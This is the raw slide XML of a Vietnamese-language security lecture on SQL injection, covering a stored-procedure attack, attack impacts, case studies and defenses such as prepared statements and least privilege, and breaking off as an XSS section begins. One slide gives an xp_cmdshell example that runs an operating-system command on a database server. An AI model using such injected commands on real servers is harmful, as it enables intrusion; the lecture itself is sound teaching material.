              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>Dạng 5: Tấn công SQL bằng Stored Procedures (Thủ tục Lưu trữ):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04F3DB0-5980-58E2-4F3A-E0C3142CE83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37</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6264C3E1-0D49-C508-ACF0-5653F99688F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195649" y="1616150"/>
            <a:ext cx="8915400" cy="3603550"/>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Sử dụng các thủ tục lưu trữ có sẵn để thực thi các lệnh trên hệ điều hành máy chủ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ví dụ: </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kern="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EXEC</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kern="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xp_cmdshell</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'cmd.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="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dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="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 C:'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="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200" kern="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Câu lệnh này sử dụng thủ tục mở rộng xp_cmdshell để chạy lệnh dir C: trên hệ điều hành của máy chủ, cho phép kẻ tấn công liệt kê thư mục.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1034476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E637-591C-3529-88E7-5C43B982D8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9194F7-7DE0-52A1-EDFC-9D6F8265664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D212F568-A672-FDFD-D13F-034074EB7666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.1.4. Tác động của các cuộc tấn công SQL Injection thành công</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676AEDC7-05F7-FC69-D35F-6CD58170909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38</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD067A3B-1453-9100-0B1B-7FC787A001A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195649" y="1616150"/>
            <a:ext cx="8915400" cy="3080329"/>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Truy cập trái phép: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Lấy danh sách người dùng, thông tin nhận dạng cá nhân (PII), số thẻ tín dụng và các dữ liệu nhạy cảm khác.</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Mất dữ liệu: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Thay đổi hoặc xóa dữ liệu.</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Chiếm quyền quản trị: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Hacker có được quyền quản trị hệ thống hoặc CSDL cơ bản.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1479437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60148-BFFF-3165-D040-4EB05337565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086880-BBEB-4A14-47E1-D3E65F1FED4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D47CE1D1-3B02-C5A6-DDA5-296281A9D4F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2.1.4. Tác động của các cuộc tấn công SQL Injection thành công</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4B5771F0-E397-2D4B-4526-1D9F6B60F1A5}"/>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39</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A612AC78-56E3-B46E-8C90-7D9253A71DC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="195649" y="1616150"/>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Case study: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Vụ vi phạm dữ liệu Equifax (2017) xâm phạm hồ sơ của 143 triệu người, và cuộc tấn công Sony PlayStation Network (2011) làm mất 77 triệu người dùng.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1172738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95478"/>
            <a:ext cx="7051040" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-25" dirty="0"/>
              <a:t>Integrity (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-25" dirty="0" err="1"/>
              <a:t>Tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-25" dirty="0" err="1"/>
              <a:t>toàn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-25" dirty="0" err="1"/>
              <a:t>vẹn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-25" dirty="0"/>
              <a:t>): </a:t>
            </a:r>
            <a:endParaRPr spc="-25"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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535941" y="1256791"/>
            <a:ext cx="7541260" cy="2333972"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Đảm bảo tính chính xác và đầy đủ của thông tin, ngăn chặn sửa đổi hoặc phá hủy trái phép.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Vi phạm: Kẻ tấn công SQL Injection có thể sửa, xóa hoặc thay đổi toàn bộ dữ liệu trong cơ sở dữ liệu, phá vỡ tính toàn vẹn.</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="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B513F-1528-640A-5454-1574AE061AB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394D1C6-A97C-DA25-5802-67B9FA0A091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ED727A1-3D49-95AD-72A7-0CA1B86B1CBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="3244478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>2.1.5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Biện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>chông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <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00131732-0291-3277-0F11-0BF54970B2A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40</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD222265-EBCE-2BB2-CC18-4C58FEF50559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1518455"/>
            <a:ext cx="8915400" cy="390106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Kiểm tra và lọc dữ liệu đầu vào (Input Validation &amp; Sanitization): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Biện pháp cơ bản và quan trọng nhất. Nên sử dụng danh sách trắng (Whitelist) để chỉ chấp nhận các ký tự được phép; danh sách đen (Blacklist) không được khuyến nghị vì dễ bị lỗi.</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Prepared Statements (Câu lệnh chuẩn bị): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tách biệt mã SQL với dữ liệu đầu vào bằng cách sử dụng tham số (placeholder).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2179498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C9D40-9E78-9ED0-CCEA-924DB56D2DD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E308ACC-F94B-04EB-5FCA-D851A39FBCA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3EA2904-A3D3-6D06-E538-5BF94AD52969}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="3244478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>2.1.5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Biện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>chông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <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73849C66-32F2-6516-A4BE-956BAA278CB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41</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37F54F57-FCBC-5FF7-D9D6-6337B58912B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1518455"/>
            <a:ext cx="8915400" cy="3080329"/>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Thực hiện truy vấn có tham số: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>iảm khả năng xảy ra lỗ hổng bằng cách tự động khử trùng dữ liệu.</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Gán quyền thích hợp cho người dùng: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Áp dụng nguyên tắc đặc quyền tối thiểu (Least Privilege), tránh sử dụng tài khoản có quyền quản trị tối cao (sa)</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endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2104412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37014-8ABE-0E55-47F2-313E97E37BA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D71F780-5938-4ADF-3423-0F2D10CD1C9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B4DAE69-B693-0F12-29EE-F9B2A091904C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="3244478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>2.1.5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Biện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>chông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> SQL Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <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9FBC579E-97E0-48C4-9AB4-22B3B62D7BE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42</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10A043A1-80B2-1858-C2B3-78DCA5A212DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1518455"/>
            <a:ext cx="8915400" cy="4003659"/>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Hạn chế thông báo lỗi chi tiết: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Không hiển thị lỗi CSDL trực tiếp cho người dùng vì chúng có thể tiết lộ cấu trúc CSDL.</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Cập nhật và vá lỗi máy chủ: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Cập nhật bản vá lỗi bảo mật thường xuyên cho CSDL và hệ điều hành.</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Sử dụng hệ thống tường lửa (Firewall) và IDS/IPS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Đặt máy chủ CSDL sau tường lửa và sử dụng IDS/IPS (ví dụ: SNORT) để phát hiện truy vấn khả nghi.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="955906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D7CC1-7462-AEEF-4E4F-5B8F5EADC6D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59D5C23-0750-BD1C-6907-0E4D7526363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9AA04F7C-3B3E-08B0-C166-D160D9EE97B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="5183470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>2.2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.2.1. </a:t>
            </a:r>
